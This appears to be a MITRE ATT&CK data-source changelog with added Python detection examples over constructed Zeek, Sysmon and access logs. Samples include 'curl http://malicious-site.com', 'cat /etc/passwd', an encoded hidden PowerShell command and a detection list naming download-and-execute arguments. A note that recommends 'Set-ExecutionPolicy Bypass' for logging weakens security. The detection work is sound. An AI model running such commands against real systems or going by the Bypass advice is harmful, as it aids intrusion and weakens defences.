- AuditD (Linux) – syscall=connect, Monitors outbound network requests from processes. `auditctl -a always,exit -F arch=b64 -S connect -k network_activity`
- Cloud & SaaS Traffic Collection
- AWS VPC Flow Logs / Azure NSG Flow Logs / Google VPC Flow Logs, Captures metadata about inbound/outbound network traffic.
- Cloud IDS (AWS GuardDuty, Azure Sentinel, Google Chronicle), Detects malicious activity in cloud environments by analyzing network traffic patterns. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Network Traffic: Network Traffic Flow
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['ics-attack', 'mobile-attack', 'enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.274Z | 2025-04-18T15:11:20.168Z |
description | Summarized network packet data, with metrics, such as protocol headers and volume (ex: Netflow or Zeek http.log) | Summarized network packet data that captures session-level details such as source/destination IPs, ports, protocol types, timestamps, and data volume, without storing full packet payloads. This is commonly used for traffic analysis, anomaly detection, and network performance monitoring.
*Data Collection Measures:*
- Network Flow Logs (Metadata Collection)
- NetFlow
- Summarized metadata for network conversations (no packet payloads).
- sFlow (Sampled Flow Logging)
- Captures sampled packets from switches and routers.
- Used for real-time traffic monitoring and anomaly detection.
- Zeek (Bro) Flow Logs
- Zeek logs session-level details in logs like conn.log, http.log, dns.log, etc.
- Host-Based Collection
- Sysmon Event ID 3 – Network Connection Initiated
- Logs process-level network activity, useful for detecting malicious outbound connections.
- AuditD (Linux) – syscall=connect
- Monitors system calls for network connections. `auditctl -a always,exit -F arch=b64 -S connect -k network_activity`
- Cloud & SaaS Flow Monitoring
- AWS VPC Flow Logs
- Captures metadata for traffic between EC2 instances, security groups, and internet gateways.
- Azure NSG Flow Logs / Google VPC Flow Logs
- Logs ingress/egress traffic for cloud-based resources. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
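The two Network Traffic components above answer different questions: flow records (conn.log, NetFlow, VPC Flow Logs) carry who talked to whom, when and how much, while content records (PCAP, Zeek http.log) carry what was said. The Python script below is added here as an example and is not part of the ATT&CK changelog or of the Zeek project; it parses constructed Zeek `conn.log` and `http.log` excerpts (embedded in the block, not real captures) and shows a flow-only check (regular connection intervals, large inbound transfers) beside a content check (Host header and User-Agent inspection). The sample rows, the thresholds (four connections, coefficient of variation 0.2, 50,000 response bytes) and the two content heuristics are illustrative assumptions.

```python
"""Flow (conn.log) versus content (http.log) analysis over constructed Zeek logs."""
import statistics
from collections import defaultdict

# Constructed sample logs in Zeek's TSV layout; the '#fields' line names the columns.
# Not real captures: four regular HTTP POSTs from 10.0.0.5 and two TLS sessions from 10.0.0.7.
CONN_LOG = """#separator \\x09
#fields\tts\tuid\tid.orig_h\tid.orig_p\tid.resp_h\tid.resp_p\tproto\tservice\tduration\torig_bytes\tresp_bytes\tconn_state
#types\ttime\tstring\taddr\tport\taddr\tport\tenum\tstring\tinterval\tcount\tcount\tstring
1700000000.000\tC1\t10.0.0.5\t51000\t203.0.113.9\t80\ttcp\thttp\t0.20\t512\t300\tSF
1700000060.000\tC2\t10.0.0.5\t51001\t203.0.113.9\t80\ttcp\thttp\t0.21\t510\t301\tSF
1700000120.000\tC3\t10.0.0.5\t51002\t203.0.113.9\t80\ttcp\thttp\t0.19\t515\t298\tSF
1700000180.000\tC4\t10.0.0.5\t51003\t203.0.113.9\t80\ttcp\thttp\t0.20\t511\t302\tSF
1700000015.000\tC5\t10.0.0.7\t52000\t198.51.100.20\t443\ttcp\tssl\t3.10\t2048\t91000\tSF
1700000400.000\tC6\t10.0.0.7\t52001\t198.51.100.20\t443\ttcp\tssl\t1.50\t1800\t45000\tSF
"""

HTTP_LOG = """#fields\tts\tuid\tid.orig_h\tid.orig_p\tid.resp_h\tid.resp_p\tmethod\thost\turi\tuser_agent\tstatus_code
1700000000.100\tC1\t10.0.0.5\t51000\t203.0.113.9\t80\tPOST\t203.0.113.9\t/gate.php\tMozilla/4.0 (compatible; MSIE 6.0)\t200
1700000060.100\tC2\t10.0.0.5\t51001\t203.0.113.9\t80\tPOST\t203.0.113.9\t/gate.php\tMozilla/4.0 (compatible; MSIE 6.0)\t200
1700000120.100\tC3\t10.0.0.5\t51002\t203.0.113.9\t80\tPOST\t203.0.113.9\t/gate.php\tMozilla/4.0 (compatible; MSIE 6.0)\t200
1700000180.100\tC4\t10.0.0.5\t51003\t203.0.113.9\t80\tPOST\t203.0.113.9\t/gate.php\tMozilla/4.0 (compatible; MSIE 6.0)\t200
"""


def parse_zeek(text):
    """Turn a Zeek ASCII log into a list of dicts keyed by the '#fields' names."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#fields"):
            fields = line.split("\t")[1:]
        elif line.startswith("#") or not line.strip():
            continue
        else:
            rows.append(dict(zip(fields, line.split("\t"))))
    return rows


def beacon_candidates(conns, min_conns=4, max_cv=0.2):
    """Flow-only view: hosts talking to one peer at near-constant intervals.

    Returns {(orig_h, resp_h, resp_p): mean_interval_seconds}; no payload is needed.
    """
    groups = defaultdict(list)
    for c in conns:
        groups[(c["id.orig_h"], c["id.resp_h"], c["id.resp_p"])].append(float(c["ts"]))
    found = {}
    for key, times in groups.items():
        if len(times) < min_conns:
            continue
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        cv = statistics.pstdev(gaps) / mean if mean else 0.0  # coefficient of variation
        if cv <= max_cv:
            found[key] = round(mean, 1)
    return found


def large_inbound(conns, min_resp_bytes=50_000):
    """Flow-only view: sessions where the server side sent an unusually large payload."""
    return [c["uid"] for c in conns if int(c["resp_bytes"]) >= min_resp_bytes]


def content_findings(https):
    """Content view: things only visible once headers and bodies are captured."""
    findings = []
    for h in https:
        reasons = []
        if h["host"].replace(".", "").isdigit():
            reasons.append("Host header is a bare IP address")
        if "MSIE 6.0" in h["user_agent"]:
            reasons.append("obsolete User-Agent")
        if reasons:
            findings.append((h["uid"], f'{h["method"]} {h["host"]}{h["uri"]}', reasons))
    return findings


def analyze(conn_text=CONN_LOG, http_text=HTTP_LOG):
    """Combine both views; TLS sessions only ever appear in the flow findings."""
    conns, https = parse_zeek(conn_text), parse_zeek(http_text)
    uids_with_content = {h["uid"] for h in https}
    return {
        "beacons": beacon_candidates(conns),
        "large_inbound": large_inbound(conns),
        "content": content_findings(https),
        "flow_only_uids": sorted(c["uid"] for c in conns if c["uid"] not in uids_with_content),
    }


if __name__ == "__main__":
    for section, value in analyze().items():
        print(f"{section}: {value}")
```

Run it as-is to print the findings; the TLS sessions C5 and C6 appear only in the flow findings because no payload was decoded for them. One caveat on the collection one-liner quoted in the Network Traffic Content description: `echo "..." > local.zeek | zeek -Cr capture.pcap local.zeek` redirects the `echo` output to a file and then pipes an empty stream into `zeek`; run the two commands one after the other (`;` or `&&`). The Zeek option that selects the ASCII writer is `Log::default_writer = Log::WRITER_ASCII`, and since that is already the default, `zeek -Cr capture.pcap` alone writes the TSV logs this script reads.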
Process: Process Creation
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_domains | | ['ics-attack', 'mobile-attack', 'enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-07T16:15:56.932Z | 2025-04-18T15:10:27.797Z |
description | The initial construction of an executable managed by the OS, that may involve one or more tasks or threads. (e.g. Win EID 4688, Sysmon EID 1, cmd.exe > net use, etc.) | Refers to the event in which a new process (executable) is initialized by an operating system. This can involve parent-child process relationships, process arguments, and environmental variables. Monitoring process creation is crucial for detecting malicious behaviors, such as execution of unauthorized binaries, scripting abuse, or privilege escalation attempts.
*Data Collection Measures:*
- Endpoint Detection and Response (EDR) Tools:
- EDRs provide process telemetry, tracking execution flows and arguments.
- Windows Event Logs:
- Event ID 4688 (Audit Process Creation): Captures process creation with associated parent process.
- Sysmon (Windows):
- Event ID 1 (Process Creation): Provides detailed logging
- Linux/macOS Monitoring:
- AuditD (execve syscall): Logs process creation.
- eBPF/XDP: Used for low-level monitoring of system calls related to process execution.
- OSQuery: Allows SQL-like queries to track process events (process_events table).
- Apple Endpoint Security Framework (ESF): Monitors process creation on macOS.
- Network-Based Monitoring:
- Zeek (Bro) Logs: Captures network-based process execution related to remote shells.
- Syslog/OSSEC: Tracks execution of processes on distributed systems.
- Behavioral SIEM Rules:
- Monitor process creation for uncommon binaries in user directories.
- Detect processes with suspicious command-line arguments. |
x_mitre_version | 1.1 | 1.2 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Process: Process Termination
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['ics-attack', 'mobile-attack', 'enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.272Z | 2025-04-18T15:10:34.519Z |
description | Exit of a running process (ex: Sysmon EID 5 or Windows EID 4689) | The exit or termination of a running process on a system. This can occur due to normal operations, user-initiated commands, or malicious actions such as process termination by malware to disable security controls.
*Data Collection Measures:*
- Endpoint Detection and Response (EDR) Tools:
- Monitor process termination events.
- Windows Event Logs:
- Event ID 4689 (Process Termination) – Captures when a process exits, including process ID and parent process.
- Event ID 7036 (Service Control Manager) – Monitors system service stops.
- Sysmon (Windows):
- Event ID 5 (Process Termination) – Detects when a process exits, including parent-child relationships.
- Linux/macOS Monitoring:
- AuditD (`execve`, `exit_group`, `kill` syscalls) – Captures process termination via command-line interactions.
- eBPF/XDP: Monitors low-level system calls related to process termination.
- OSQuery: The processes table can be queried for abnormal exits. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
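Process creation and termination are usually analysed together: the creation record supplies the parent, the command line and the user, and the termination record becomes useful once it is joined back to it. The following script is an added example, not code from the ATT&CK changelog or from Sysmon; it runs the two behavioural rules listed under Process Creation (binaries in user directories, suspicious command-line arguments) and a sensor-termination rule over constructed Sysmon Event ID 1 and Event ID 5 records, in the shape a SIEM sees after the XML is parsed. The GUIDs, user names, paths, the sensor image list and the argument patterns are hypothetical.

```python
"""Correlating constructed Sysmon Event ID 1 (create) and Event ID 5 (terminate) records."""
import ntpath
from datetime import datetime

# Constructed events as a SIEM would ingest them from the Sysmon XML (not real telemetry).
# ProcessGuids, users and paths are hypothetical.
EVENTS = [
    {"EventID": 1, "UtcTime": "2025-04-18 15:00:00.000", "ProcessGuid": "P1",
     "Image": r"C:\Windows\explorer.exe", "CommandLine": "explorer.exe",
     "ParentProcessGuid": "P0", "User": r"CORP\alice"},
    {"EventID": 1, "UtcTime": "2025-04-18 15:00:05.000", "ProcessGuid": "P2",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgA",
     "ParentProcessGuid": "P1", "User": r"CORP\alice"},
    {"EventID": 1, "UtcTime": "2025-04-18 15:00:07.000", "ProcessGuid": "P3",
     "Image": r"C:\Users\alice\AppData\Local\Temp\update.exe",
     "CommandLine": r"C:\Users\alice\AppData\Local\Temp\update.exe",
     "ParentProcessGuid": "P2", "User": r"CORP\alice"},
    {"EventID": 1, "UtcTime": "2025-04-18 14:00:00.000", "ProcessGuid": "P9",
     "Image": r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18\MsMpEng.exe",
     "CommandLine": "MsMpEng.exe", "ParentProcessGuid": "P0", "User": "NT AUTHORITY\\SYSTEM"},
    {"EventID": 5, "UtcTime": "2025-04-18 15:00:09.000", "ProcessGuid": "P9",
     "Image": r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18\MsMpEng.exe"},
    {"EventID": 5, "UtcTime": "2025-04-18 15:00:10.000", "ProcessGuid": "P2",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
]

# Hypothetical tuning lists; a real deployment derives these from its own baseline.
SENSOR_IMAGES = {"msmpeng.exe", "sysmon64.exe", "sysmon.exe"}
SUSPICIOUS_ARGS = ("-enc", "-encodedcommand", "iex ", "downloadstring", "-w hidden")


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S.%f")


def creation_findings(events):
    """Rules from the Process Creation notes: user-directory binaries, suspicious arguments."""
    findings = []
    for e in events:
        if e["EventID"] != 1:
            continue
        image, cmd = e["Image"].lower(), e["CommandLine"].lower()
        if image.startswith("c:\\users\\") and image.endswith(".exe"):
            findings.append((e["ProcessGuid"], "executable launched from a user profile directory"))
        hits = [a for a in SUSPICIOUS_ARGS if a in cmd]
        if hits:
            findings.append((e["ProcessGuid"], "suspicious command-line arguments: " + ", ".join(hits)))
    return findings


def termination_findings(events):
    """Event ID 5 for a security sensor image, with lifetime taken from the matching Event ID 1."""
    created = {e["ProcessGuid"]: e for e in events if e["EventID"] == 1}
    findings = []
    for e in events:
        if e["EventID"] != 5 or ntpath.basename(e["Image"]).lower() not in SENSOR_IMAGES:
            continue
        start = created.get(e["ProcessGuid"])
        lifetime = (_ts(e["UtcTime"]) - _ts(start["UtcTime"])).total_seconds() if start else None
        findings.append((e["ProcessGuid"], ntpath.basename(e["Image"]), lifetime))
    return findings


def ancestry(events, guid):
    """Walk ParentProcessGuid links back to the root; returns image basenames, child first."""
    created = {e["ProcessGuid"]: e for e in events if e["EventID"] == 1}
    chain = []
    while guid in created:
        chain.append(ntpath.basename(created[guid]["Image"]))
        guid = created[guid]["ParentProcessGuid"]
    return chain


if __name__ == "__main__":
    for finding in creation_findings(EVENTS) + termination_findings(EVENTS):
        print(finding)
    print(" <- ".join(ancestry(EVENTS, "P3")))
```

Sysmon Event ID 5 itself carries only the time, ProcessGuid, ProcessId, Image and User; the parent-child view the description mentions comes from joining on ProcessGuid to the Event ID 1 record, which is what `termination_findings` and `ancestry` do. Neither event says which process issued the terminate; Sysmon Event ID 10 (ProcessAccess) with GrantedAccess 0x1 (PROCESS_TERMINATE) is where that shows up.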
Patches
Application Vetting: API Calls
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-13T19:59:14.491Z | 2025-04-16T21:22:21.246Z |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
Sensor Health: Host Status
Current version: 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_domains | | ['mobile-attack', 'enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-20T20:22:45.613Z | 2025-04-18T15:16:18.582Z |
description | Logging, messaging, and other artifacts highlighting the health of host sensors (ex: metrics, errors, and/or exceptions from logging applications) | Logging, messaging, and other artifacts that highlight the health and operational state of host-based security sensors, such as Endpoint Detection and Response (EDR) agents, antivirus software, logging services, and system monitoring tools. Monitoring sensor health is essential for detecting misconfigurations, sensor failures, tampering, or deliberate security control evasion by adversaries.
*Data Collection Measures:*
- Windows Event Logs:
- Event ID 1074 (System Shutdown): Detects unexpected system reboots/shutdowns.
- Event ID 6006 (Event Log Stopped): Logs when Windows event logging is stopped.
- Event ID 16 (Sysmon): Detects configuration state changes that may indicate log tampering.
- Event ID 12 (Windows Defender Status Change) – Detects changes in Windows Defender state.
- Linux/macOS Monitoring:
- `/var/log/syslog`, `/var/log/auth.log`, `/var/log/kern.log`
- Journald (journalctl) for kernel and system alerts.
- Endpoint Detection and Response (EDR) Tools:
- Monitor agent health status, detect sensor tampering, and alert on missing telemetry.
- Mobile Threat Intelligence Logs:
- Samsung Knox, SafetyNet, iOS Secure Enclave provide sensor health status for mobile endpoints. |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
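For Sensor Health the practical question is not which event IDs exist but how to turn them, together with the agent's own heartbeats, into a ranked list of hosts to look at. The script below is an added example (not part of the ATT&CK changelog or of any vendor's agent); it works over constructed heartbeat and Windows event records, keyed by the provider and event IDs listed above, and ranks a host that went quiet shortly after a Sysmon configuration change or an Event Log stop above one that simply stopped reporting. Host names, timestamps and the 600-second silence threshold are illustrative.

```python
"""Triage of host sensor health from constructed heartbeat and Windows event records."""
from collections import defaultdict

# Constructed records (not real telemetry): one row per event, timestamps in epoch seconds.
# Sources: EDR agent heartbeats, the Windows 'System' log, and Sysmon's operational log.
RECORDS = [
    {"host": "WS01", "ts": 1_700_000_000, "source": "edr", "event_id": "heartbeat"},
    {"host": "WS01", "ts": 1_700_000_300, "source": "edr", "event_id": "heartbeat"},
    {"host": "WS02", "ts": 1_700_000_000, "source": "edr", "event_id": "heartbeat"},
    {"host": "WS02", "ts": 1_700_000_200, "source": "Microsoft-Windows-Sysmon", "event_id": 16},
    {"host": "WS02", "ts": 1_700_000_230, "source": "EventLog", "event_id": 6006},
    {"host": "WS03", "ts": 1_700_000_100, "source": "edr", "event_id": "heartbeat"},
    {"host": "WS03", "ts": 1_700_000_150, "source": "User32", "event_id": 1074},
    {"host": "WS03", "ts": 1_700_000_900, "source": "edr", "event_id": "heartbeat"},
    {"host": "WS04", "ts": 1_700_000_950, "source": "edr", "event_id": "heartbeat"},
]

# Events the description lists as sensor-state indicators, keyed by (provider, id).
TAMPER_INDICATORS = {
    ("Microsoft-Windows-Sysmon", 16): "Sysmon configuration changed",
    ("EventLog", 6006): "Event Log service stopped",
    ("User32", 1074): "system shutdown or restart requested",
}


def last_seen(records):
    """Latest timestamp of any record per host; silence is measured from here."""
    seen = {}
    for r in records:
        seen[r["host"]] = max(seen.get(r["host"], 0), r["ts"])
    return seen


def tamper_events(records):
    """Per host, the (ts, description) of every tamper indicator, oldest first."""
    out = defaultdict(list)
    for r in records:
        label = TAMPER_INDICATORS.get((r["source"], r["event_id"]))
        if label:
            out[r["host"]].append((r["ts"], label))
    return {h: sorted(v) for h, v in out.items()}


def triage(records, now, max_silence=600):
    """Severity per host: silent after a tamper indicator > silent > tamper only > healthy.

    A host that stopped logging shortly after Sysmon or Event Log state changed looks like
    deliberate sensor evasion rather than an agent outage, so it ranks highest.
    """
    seen, tamper = last_seen(records), tamper_events(records)
    result = {}
    for host, ts in seen.items():
        silent = now - ts > max_silence
        indicators = [label for _, label in tamper.get(host, [])]
        if silent and indicators:
            result[host] = ("high", indicators)
        elif silent:
            result[host] = ("medium", ["no telemetry for %ds" % (now - ts)])
        elif indicators:
            result[host] = ("low", indicators)
        else:
            result[host] = ("ok", [])
    return result


if __name__ == "__main__":
    for host, (severity, why) in sorted(triage(RECORDS, now=1_700_001_000).items()):
        print(host, severity, "; ".join(why))
```

Silence is measured from the last record of any kind, so a host whose EDR agent was killed but that still forwards Windows events stays below the threshold; if agent silence and event-forwarding silence should be tracked separately, call `last_seen` on each source's records. Event ID 6006 is written only when the Event Log service stops cleanly; clearing a log leaves Event ID 1102 (Security) or 104 (System) instead, so those belong in `TAMPER_INDICATORS` as well.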
Application Vetting: Network Communication
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-13T19:59:42.141Z | 2025-04-16T21:22:21.724Z |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
User Interface: Permissions Request
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-13T20:47:24.038Z | 2025-04-16T21:22:21.873Z |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
Application Vetting: Permissions Requests
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-13T20:00:08.487Z | 2025-04-16T21:22:21.394Z |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
Process: Process Metadata
Current version: 1.0
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['ics-attack', 'mobile-attack', 'enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.272Z | 2025-04-18T15:10:37.873Z |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Application Vetting: Protected Configuration
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-13T20:00:38.029Z | 2025-04-16T21:22:22.260Z |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
User Interface: System Notifications
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-13T20:47:52.557Z | 2025-04-16T21:22:22.106Z |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
User Interface: System Settings
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-13T20:48:14.540Z | 2025-04-16T21:22:21.541Z |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
ics-attack
Minor Version Changes
Application Log: Application Log Content
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.272Z | 2025-04-18T15:09:35.474Z |
description | Logging, messaging, and other artifacts provided by third-party services (ex: metrics, errors, and/or alerts from mail/web applications) | Application Log Content refers to logs generated by applications or services, providing a record of their activity. These logs may include metrics, errors, performance data, and operational alerts from web, mail, or other applications. These logs are vital for monitoring application behavior and detecting malicious activities or anomalies. Examples:
- Web Application Logs: These logs include information about requests, responses, errors, and security events (e.g., unauthorized access attempts).
- Email Application Logs: Logs contain metadata about emails sent, received, or blocked (e.g., sender/receiver addresses, message IDs).
- SaaS Application Logs: Activity logs include user logins, configuration changes, and access to sensitive resources.
- Cloud Application Logs: Logs detail control plane activities, including API calls, instance modifications, and network changes.
- System/Application Monitoring Logs: Logs provide insights into application performance, errors, and anomalies.
This data component can be collected through the following measures:
Configure Application Logging
- Enable logging within the application or service.
- Examples:
- Web Servers: Enable access and error logs in NGINX or Apache.
- Email Systems: Enable audit logging in Microsoft Exchange or Gmail.
Centralized Log Management
- Use log management solutions like Splunk, or a cloud-native logging solution.
- Configure the application to send logs to a centralized system for analysis.
Cloud-Specific Collection
- Use services like AWS CloudWatch, Azure Monitor, or Google Cloud Operations Suite for cloud-based applications.
- Ensure logging is enabled for all critical resources (e.g., API calls, IAM changes).
SIEM Integration
- Integrate application logs with a SIEM platform (e.g., Splunk, QRadar) for real-time correlation and analysis.
- Use parsers to standardize log formats and extract key fields like timestamps, user IDs, and error codes. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
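The Application Log Content examples mention web server access logs and unauthorized access attempts; the script below shows what that looks like once the log is in a SIEM or a script. It is an added example, not code from the ATT&CK changelog or from NGINX or Apache; it parses constructed combined-format access log lines (embedded in the block) and runs two checks, a burst of 401/403 responses from one source and a success that follows a run of failures on the same path. The IPs, paths and thresholds (four failures in 60 seconds, three failures before a success) are illustrative.

```python
"""Detection over constructed NGINX/Apache combined-format access log lines."""
import re
from collections import defaultdict
from datetime import datetime

# Constructed log lines (not from a real server); 203.0.113.7 hammers an admin login.
ACCESS_LOG = """\
203.0.113.7 - - [18/Apr/2025:15:00:01 +0000] "POST /admin/login HTTP/1.1" 401 512 "-" "curl/8.4.0"
203.0.113.7 - - [18/Apr/2025:15:00:02 +0000] "POST /admin/login HTTP/1.1" 401 512 "-" "curl/8.4.0"
203.0.113.7 - - [18/Apr/2025:15:00:03 +0000] "POST /admin/login HTTP/1.1" 401 512 "-" "curl/8.4.0"
203.0.113.7 - - [18/Apr/2025:15:00:04 +0000] "POST /admin/login HTTP/1.1" 401 512 "-" "curl/8.4.0"
203.0.113.7 - - [18/Apr/2025:15:00:05 +0000] "POST /admin/login HTTP/1.1" 200 2048 "-" "curl/8.4.0"
198.51.100.4 - - [18/Apr/2025:15:00:10 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
198.51.100.4 - - [18/Apr/2025:15:10:00 +0000] "GET /admin/ HTTP/1.1" 403 128 "-" "Mozilla/5.0"
198.51.100.4 - - [18/Apr/2025:15:30:00 +0000] "GET /admin/ HTTP/1.1" 403 128 "-" "Mozilla/5.0"
"""

# Combined log format: ip ident user [time] "request" status bytes "referer" "user-agent"
LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)


def parse_access_log(text):
    """One dict per well-formed line; malformed lines are counted rather than dropped silently."""
    entries, bad = [], 0
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            bad += 1
            continue
        d = m.groupdict()
        d["time"] = datetime.strptime(d["time"], "%d/%b/%Y:%H:%M:%S %z")
        d["status"] = int(d["status"])
        entries.append(d)
    return entries, bad


def auth_failure_bursts(entries, threshold=4, window_s=60):
    """Sources with >= threshold 401/403 responses inside any window_s-second span."""
    by_ip = defaultdict(list)
    for e in entries:
        if e["status"] in (401, 403):
            by_ip[e["ip"]].append(e["time"])
    bursts = {}
    for ip, times in by_ip.items():
        times.sort()
        for i, start in enumerate(times):
            span = [t for t in times[i:] if (t - start).total_seconds() <= window_s]
            if len(span) >= threshold:
                bursts[ip] = len(span)
                break
    return bursts


def success_after_failures(entries, failures_before=3):
    """A 2xx on the same path right after a run of failures from the same source."""
    runs, hits = defaultdict(int), []
    for e in sorted(entries, key=lambda x: x["time"]):
        key = (e["ip"], e["path"])
        if e["status"] in (401, 403):
            runs[key] += 1
        elif 200 <= e["status"] < 300 and runs[key] >= failures_before:
            hits.append((e["ip"], e["path"], runs[key]))
            runs[key] = 0
        else:
            runs[key] = 0
    return hits


if __name__ == "__main__":
    entries, bad = parse_access_log(ACCESS_LOG)
    print("parsed", len(entries), "lines,", bad, "malformed")
    print("bursts:", auth_failure_bursts(entries))
    print("success after failures:", success_after_failures(entries))
```

The layout is shared by NGINX's default `combined` log and Apache's combined `LogFormat`, so the same regex applies to both. `parse_access_log` counts lines it cannot parse instead of dropping them, because a sudden rise in malformed lines is itself worth an alert: it means either log injection or a format change that has silently blinded the rules.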
Command: Command Execution
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_domains | | ['ics-attack', 'mobile-attack', 'enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-07T16:14:39.124Z | 2025-04-18T15:11:30.145Z |
description | The execution of a line of text, potentially with arguments, created from program code (e.g. a cmdlet executed via powershell.exe, interactive commands like >dir, shell executions, etc. ) | Command Execution involves monitoring and capturing the execution of textual commands (including shell commands, cmdlets, and scripts) within an operating system or application. These commands may include arguments or parameters and are typically executed through interpreters such as `cmd.exe`, `bash`, `zsh`, `PowerShell`, or programmatic execution. Examples:
- Windows Command Prompt
- dir – Lists directory contents.
- net user – Queries or manipulates user accounts.
- tasklist – Lists running processes.
- PowerShell
- Get-Process – Retrieves processes running on a system.
- Set-ExecutionPolicy – Changes PowerShell script execution policies.
- Invoke-WebRequest – Downloads remote resources.
- Linux Shell
- ls – Lists files in a directory.
- cat /etc/passwd – Reads the user accounts file.
- curl http://malicious-site.com – Retrieves content from a malicious URL.
- Container Environments
- docker exec – Executes a command inside a running container.
- kubectl exec – Runs commands in Kubernetes pods.
- macOS Terminal
- open – Opens files or URLs.
- dscl . -list /Users – Lists all users on the system.
- osascript -e – Executes AppleScript commands.
This data component can be collected through the following measures:
Enable Command Logging
- Windows:
- Enable PowerShell logging: `Set-ExecutionPolicy Bypass`, `Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Name EnableScriptBlockLogging -Value 1`
- Enable Windows Event Logging:
- Event ID 4688: Tracks process creation, including command-line arguments.
- Event ID 4104: Logs PowerShell script block execution.
- Linux/macOS:
- Enable shell history logging in `.bashrc` or `.zshrc`: `export HISTTIMEFORMAT="%d/%m/%y %T "`, `export PROMPT_COMMAND='history -a; history -w'`
- Use audit frameworks (e.g., `auditd`) to log command executions. Example rule to log all `execve` syscalls: `-a always,exit -F arch=b64 -S execve -k cmd_exec`
- Containers:
- Use runtime-specific tools like Docker’s --log-driver or Kubernetes Audit Logs to capture exec commands.
Integrate with Centralized Logging
- Collect logs using a SIEM (e.g., Splunk) or cloud-based log aggregation tools like AWS CloudWatch or Azure Monitor. Example Splunk Search for Windows Event 4688:
`index=windows EventID=4688 CommandLine=*`
Use Endpoint Detection and Response (EDR) Tools
- Monitor command executions via EDR solutions
Deploy Sysmon for Advanced Logging (Windows)
- Use Sysmon's Event ID 1 to log process creation with command-line arguments |
x_mitre_version | 1.1 | 1.2 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Drive: Drive Creation
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.273Z | 2025-04-18T15:12:36.536Z |
description | Initial construction of a drive letter or mount point to a data storage device | The activity of assigning a new drive letter or creating a mount point for a data storage device, such as a USB, network share, or external hard drive, enabling access to its content on a host system. Examples:
- USB Drive Insertion: A USB drive is plugged in and automatically assigned the letter `E:\` on a Windows machine.
